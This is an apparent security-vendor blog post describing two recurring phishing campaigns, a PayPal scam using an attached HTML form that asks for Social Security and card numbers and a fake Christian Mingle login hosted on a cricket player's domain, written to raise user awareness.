Classic Scams: Paypal and Dating Phishing Emails Just Won’t Go Away

When you analyze close to 15 BILLION pieces of email and Internet data daily, you see a lot of different cyberthreats. A rare few are unique and original, but the vast majority are variations on the same themes that have been used successfully by cybercriminals for the last few years. As a reminder to our readers, we thought we’d feature a few “classic” phishing emails that just won’t go away.

Paypal—Once a Target, Always a Target 

Paypal is a great service that is used by 152 million customers in 203 markets worldwide; these customers send, receive, and hold funds in 26 different currencies. Many small business rely heavily on Paypal, so as a cybersecurity professional, you really get annoyed when you see Paypal phishing scams creeping through, targeting unsuspecting users.

CYREN analysts discovered this version just last week. In this rendition, the cybercriminal did not link to a website; instead the user is instructed to open an attached HTML file called “formattachment.html”.

When opened, the html file launches the browser and the user sees:

In the right hand navigation, the cybercriminal behind this scam uses clever social engineering by encouraging users to “Protect Your Account Info”, reminding them to never give their password to anyone, including Paypal employees. And, in fact, the phishing form itself does not ask for a password. (Of course, it does it ask for a Social Security Number and credit card information.)

When the victim clicks “Submit Form”, it is sent to directly to the cybercriminal. CYREN tested the recipient-site and found that it did not respond with malware, so the site is likely designed as a data capture point for phishing purposes.

Even True Love is a Target

Dating is a popular phishing and spam target, and this week singles seeking that one special person were enticed by a phishing email purporting to be from Christianmingle.com. Like the vast majority of phishing scams, the website looks entirely legitimate.

However, a deeper look at the website address “vernonphilander.co.za” demonstrates how the site has no relationship to the real christianmingle.com site and is a good example of how cybercriminals regularly hijack either legitimate sites, or create sites using the names of sports figures and celebrities.

In this case, Vernon Philander is a South African cricket player. The Vernon Philander website looks like this.

It’s unclear whether Mr. Philander has created a legitimate site for fans that cybercriminals have hijacked, or whether the cybercriminals used his name to create a fake site.